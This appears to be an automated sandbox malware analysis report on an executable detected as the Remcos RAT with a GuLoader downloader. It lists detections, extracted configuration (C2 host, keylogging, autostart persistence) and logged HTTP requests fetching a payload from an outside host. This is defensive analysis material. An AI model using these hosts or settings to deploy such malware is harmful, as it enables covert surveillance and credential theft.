Windows Analysis Report mU9H96igb3.exe

Overview

General Information

Sample Name: mU9H96igb3.exe
Analysis ID: 1662
MD5: 8777020a37b6797241a489a707b9784b
SHA1: a1ed1029b967295f9ce5e9d219f41dc6c7fc4d1a
SHA256: 8a45d901cab57a1b65c32aea2452f56436dcf01c37bdf7875838e6054f395d90
Infos:

Most interesting Screenshot:

Detection

Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect Any.run
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates an undocumented autostart registry key
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "monitprradministratioran.loseyourip.com:24091:1", "Assigned name": "NetGeneration", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "Dlls.exe", "Startup value": "Chrome", "Hide file": "Enable", "Mutex": "Remcos-HCJBCA", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Enable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Adobes", "Keylog folder": "Adobes", "Keylog file max size": "20000"}
Source: 00000009.00000002.137982349025.0000000000560000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}
Multi AV Scanner detection for submitted file
Source: mU9H96igb3.exe Virustotal: Detection: 32% Perma Link
Source: mU9H96igb3.exe Metadefender: Detection: 25% Perma Link
Source: mU9H96igb3.exe ReversingLabs: Detection: 24%
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR
Antivirus / Scanner detection for submitted sample
Source: mU9H96igb3.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Avira: detection malicious, Label: TR/AD.Nekark.fexqx
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Metadefender: Detection: 25% Perma Link
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe ReversingLabs: Detection: 24%
Antivirus or Machine Learning detection for unpacked file
Source: 21.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 16.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 19.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 16.2.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 17.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 18.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 2.0.mU9H96igb3.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 9.0.mU9H96igb3.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 15.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx
Source: 20.0.Dlls.exe.400000.0.unpack Avira: Label: TR/AD.Nekark.fexqx

Compliance:

barindex
Uses 32bit PE files
Source: mU9H96igb3.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 8.6.8.23 ports 0,1,2,4,9,24091
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://implantecapilarpereira.com/NetGen
Source: Malware configuration extractor URLs: monitprradministratioran.loseyourip.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: MASTER-ASCzechRepublicwwwmasterczCZ MASTER-ASCzechRepublicwwwmasterczCZ
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49809 -> 8.6.8.23:24091
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bin
Source: Dlls.exe, 00000014.00000002.139080944862.00000000007B4000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binHR
Source: mU9H96igb3.exe, 00000009.00000002.137982771661.00000000007C0000.00000004.00000001.sdmp, Dlls.exe, 00000013.00000002.142215774564.00000000006F0000.00000004.00000001.sdmp, Dlls.exe, 00000014.00000002.139080356064.00000000006B0000.00000004.00000001.sdmp, Dlls.exe, 00000015.00000002.139148878650.00000000023F0000.00000004.00000001.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binhttp://implantecapilarperei
Source: Dlls.exe, 00000014.00000002.139080544159.0000000000758000.00000004.00000020.sdmp, Dlls.exe, 00000015.00000002.139147980600.0000000000818000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binn
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.bint
Source: mU9H96igb3.exe, 00000009.00000002.137983749150.00000000009E0000.00000004.00000020.sdmp String found in binary or memory: http://implantecapilarpereira.com/NetGeneration10%20Startup_KCFPCd130.binx
Source: unknown DNS traffic detected: queries for: implantecapilarpereira.com
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: implantecapilarpereira.comCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Jump to behavior

E-Banking Fraud:

barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000014.00000002.139080988334.00000000007BD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.137983792450.00000000009E7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148441525.000000000087B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.139148381196.0000000000870000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.142216309015.00000000008EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mU9H96igb3.exe PID: 6380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 7852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 3384, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Dlls.exe PID: 4696, type: MEMORYSTR

System Summary:

barindex
Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: mU9H96igb3.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF4B8B 2_2_02BF4B8B
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0474A 2_2_02C0474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF087E 2_2_02BF087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF557A 2_2_02BF557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BE4AA2 2_2_02BE4AA2
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C01BCE 2_2_02C01BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF6BF6 2_2_02BF6BF6
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0130A 2_2_02C0130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFECDD 2_2_02BFECDD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF00C6 2_2_02BF00C6
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BFE400 2_2_02BFE400
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF7574 2_2_02BF7574
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0058474A 9_2_0058474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057557A 9_2_0057557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00574B8B 9_2_00574B8B
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057087E 9_2_0057087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057E400 9_2_0057E400
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057ECDD 9_2_0057ECDD
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005700C6 9_2_005700C6
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_005800B4 9_2_005800B4
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00564AA2 9_2_00564AA2
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00577574 9_2_00577574
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0058130A 9_2_0058130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00581BCE 9_2_00581BCE
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00576BF6 9_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C24B8B 15_2_02C24B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3474A 15_2_02C3474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2087E 15_2_02C2087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2557A 15_2_02C2557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C14AA2 15_2_02C14AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C31BCE 15_2_02C31BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C26BF6 15_2_02C26BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3130A 15_2_02C3130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C200C6 15_2_02C200C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2ECDD 15_2_02C2ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2E400 15_2_02C2E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C27574 15_2_02C27574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6087E 17_2_04F6087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F64B8B 17_2_04F64B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6557A 17_2_04F6557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7474A 17_2_04F7474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6ECDD 17_2_04F6ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F600C6 17_2_04F600C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F54AA2 17_2_04F54AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6E400 17_2_04F6E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F66BF6 17_2_04F66BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F71BCE 17_2_04F71BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F67574 17_2_04F67574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7130A 17_2_04F7130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235087E 18_2_0235087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235557A 18_2_0235557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236474A 18_2_0236474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02354B8B 18_2_02354B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235E400 18_2_0235E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02344AA2 18_2_02344AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235ECDD 18_2_0235ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_023500C6 18_2_023500C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236130A 18_2_0236130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02357574 18_2_02357574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02356BF6 18_2_02356BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02361BCE 18_2_02361BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0058474A 20_2_0058474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057557A 20_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00574B8B 20_2_00574B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057087E 20_2_0057087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057E400 20_2_0057E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057ECDD 20_2_0057ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_005700C6 20_2_005700C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_005800B4 20_2_005800B4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00564AA2 20_2_00564AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00577574 20_2_00577574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0058130A 20_2_0058130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00581BCE 20_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00576BF6 20_2_00576BF6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0058474A 21_2_0058474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057557A 21_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00574B8B 21_2_00574B8B
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057087E 21_2_0057087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057E400 21_2_0057E400
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057ECDD 21_2_0057ECDD
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_005700C6 21_2_005700C6
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_005800B4 21_2_005800B4
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00564AA2 21_2_00564AA2
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00577574 21_2_00577574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0058130A 21_2_0058130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00581BCE 21_2_00581BCE
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00576BF6 21_2_00576BF6
Contains functionality to call native functions
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0474A NtSetInformationThread, 2_2_02C0474A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C04084 NtProtectVirtualMemory, 2_2_02C04084
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF087E NtWriteVirtualMemory, 2_2_02BF087E
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF557A NtAllocateVirtualMemory, 2_2_02BF557A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02C0130A NtWriteVirtualMemory, 2_2_02C0130A
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 2_2_02BF7574 NtWriteVirtualMemory, 2_2_02BF7574
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00586E0F NtProtectVirtualMemory, 9_2_00586E0F
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00584084 NtProtectVirtualMemory, 9_2_00584084
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_00566970 NtProtectVirtualMemory, 9_2_00566970
Source: C:\Users\user\Desktop\mU9H96igb3.exe Code function: 9_2_0057557A NtAllocateVirtualMemory, 9_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3474A NtSetContextThread, 15_2_02C3474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C34084 NtProtectVirtualMemory, 15_2_02C34084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2087E NtWriteVirtualMemory, 15_2_02C2087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C2557A NtAllocateVirtualMemory, 15_2_02C2557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C3130A NtWriteVirtualMemory, 15_2_02C3130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 15_2_02C27574 NtWriteVirtualMemory, 15_2_02C27574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F74084 NtProtectVirtualMemory, 17_2_04F74084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6087E NtWriteVirtualMemory, 17_2_04F6087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F6557A NtAllocateVirtualMemory, 17_2_04F6557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7474A NtSetInformationThread, 17_2_04F7474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F67574 NtWriteVirtualMemory, 17_2_04F67574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 17_2_04F7130A NtWriteVirtualMemory, 17_2_04F7130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235087E NtWriteVirtualMemory, 18_2_0235087E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02364084 NtProtectVirtualMemory, 18_2_02364084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0235557A NtAllocateVirtualMemory, 18_2_0235557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236474A NtResumeThread, 18_2_0236474A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_0236130A NtWriteVirtualMemory, 18_2_0236130A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 18_2_02357574 NtWriteVirtualMemory, 18_2_02357574
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_0058727E Sleep,NtProtectVirtualMemory, 19_2_0058727E
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586E0F NtProtectVirtualMemory, 19_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586CD1 NtProtectVirtualMemory, 19_2_00586CD1
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586E17 NtProtectVirtualMemory, 19_2_00586E17
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_005873EB NtProtectVirtualMemory, 19_2_005873EB
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_00586CCC NtProtectVirtualMemory, 19_2_00586CCC
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 19_2_005870C5 NtProtectVirtualMemory, 19_2_005870C5
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00586E0F NtProtectVirtualMemory, 20_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00584084 NtProtectVirtualMemory, 20_2_00584084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_00566970 NtProtectVirtualMemory, 20_2_00566970
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 20_2_0057557A NtAllocateVirtualMemory, 20_2_0057557A
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00586E0F NtProtectVirtualMemory, 21_2_00586E0F
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00584084 NtProtectVirtualMemory, 21_2_00584084
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_00566970 NtProtectVirtualMemory, 21_2_00566970
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Code function: 21_2_0057557A NtAllocateVirtualMemory, 21_2_0057557A
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\mU9H96igb3.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: mU9H96igb3.exe, 00000002.00000000.137179026496.0000000000431000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000000.137581988864.0000000000431000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs mU9H96igb3.exe
Source: mU9H96igb3.exe, 00000009.00000002.137983891314.00000000009FC000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs mU9H96igb3.exe
Source: mU9H96igb3.exe Binary or memory string: OriginalFilenamePattes5.exe vs mU9H96igb3.exe
PE file contains strange resources
Source: mU9H96igb3.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dlls.exe.9.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\mU9H96igb3.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\mU9H96igb3.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobes\Dlls.exe Section loaded: edgegdi.dll Jump to behavior
